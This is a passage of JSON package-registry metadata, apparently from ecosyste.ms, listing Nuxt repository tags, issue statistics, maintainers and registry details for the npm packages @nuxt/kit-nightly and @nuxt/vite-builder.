0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2024-10-29T22:51:47.071Z","dependent_packages_count":0,"downloads":49079,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":37.22123301104748,"dependent_packages_count":52.61855168586287,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":44.91989234845518},"purl":"pkg:npm/%40nuxt/kit-nightly","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/kit-nightly","docker_dependents_count":1,"docker_downloads_count":15,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/kit-nightly","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/kit-nightly/dependencies","status":null,"funding_links":["https://github.com/sponsors/nuxt","https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2024-10-29T15:44:34.308Z","issues_count":5866,"pull_requests_count":3404,"avg_time_to_close_issue":9336455.487222355,"avg_time_to_close_pull_request":862062.3253012048,"issues_closed_count":4166,"pull_requests_closed_count":3069,"pull_request_authors_count":452,"issue_authors_count":2655,"avg_comments_per_issue":5.084896010910331,"avg_comments_per_pull_request":2.099882491186839,"merged_pull_requests_count":2749,"bot_issues_count":1,"bot_pull_requests_count":1257,"past_year_issues_count":2725,"past_year_pull_requests_count":2325,"past_year_avg_time_to_close_issue":1465899.066102591,"past_year_avg_time_to_close_pull_request":278153.12717852095,"past_year_issues_closed_count":1881,"past_year_pull_requests_closed_count":2121,"past_year_pull_request_authors_count":310,"past_year_issue_authors_count":1437,"past_year_avg_comments_per_issue":3.424954128440367,"past_year_avg_comments_per_pull_request":2.0623655913978496,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":949,"past_year_merged_pull_requests_count":1933,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":819,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":227,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"pi0","count":127,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"manniL","count":93,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":77,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"antfu","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"Atinux","count":40,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"Hebilicious","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"BobbieGoede","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"dargmuesli","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"warflash","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"ineshbose","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"farnabaz","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"madebyfabian","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"lihbr","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"arashsheyda","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"}],"active_maintainers":[{"login":"danielroe","count":497,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":153,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"manniL","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"userquin","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"BobbieGoede","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"pi0","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Atinux","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"madebyfabian","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"warflash","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"Hebilicious","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"lihbr","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"arashsheyda","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fkit-nightly/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fkit-nightly/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fkit-nightly/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fkit-nightly/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fkit-nightly/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fkit-nightly/codemeta","maintainers":[{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-10-12T13:54:43.612Z","updated_at":"2023-10-12T13:54:43.612Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1096144,"name":"@nuxt/vite-builder","ecosystem":"npm","description":"Vite bundler for Nuxt","homepage":"https://nuxt.com","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":136,"first_release_published_at":"2021-04-04T15:53:04.081Z","latest_release_published_at":"2026-05-10T23:51:06.745Z","latest_release_number":"4.4.5","last_synced_at":"2026-05-11T04:31:17.065Z","created_at":"2022-04-08T10:39:37.503Z","updated_at":"2026-05-11T04:31:17.065Z","registry_url":"https://www.npmjs.com/package/@nuxt/vite-builder","install_command":"npm install @nuxt/vite-builder","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"alpha":"4.0.0-alpha.4","rc":"4.0.0-rc.0","latest":"4.4.5","3x":"3.21.5"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Intuitive Vue Framework.","archived":false,"fork":false,"pushed_at":"2024-10-29T20:55:49.000Z","size":114898,"stargazers_count":54703,"open_issues_count":872,"forks_count":5004,"subscribers_count":793,"default_branch":"main","last_synced_at":"2024-10-29T21:25:05.500Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":"changelog.config.json","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":["nuxt"],"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2024-10-29T18:14:58.000Z","dependencies_parsed_at":"2023-12-19T04:00:01.692Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":5138,"total_committers":630,"mean_commits":8.155555555555555,"dds":0.6897625535227715,"last_synced_commit":"800902df129a13e0da40b04b3a09e0d1a9852820"},"previous_names":["nuxt/nuxt.js"],"tags_count":223,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222121833,"owners_count":16934971,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":61,"last_synced_at":"2024-05-20T15:02:00.816Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":99051,"followers":3259,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2024-05-20T15:02:03.446Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b2633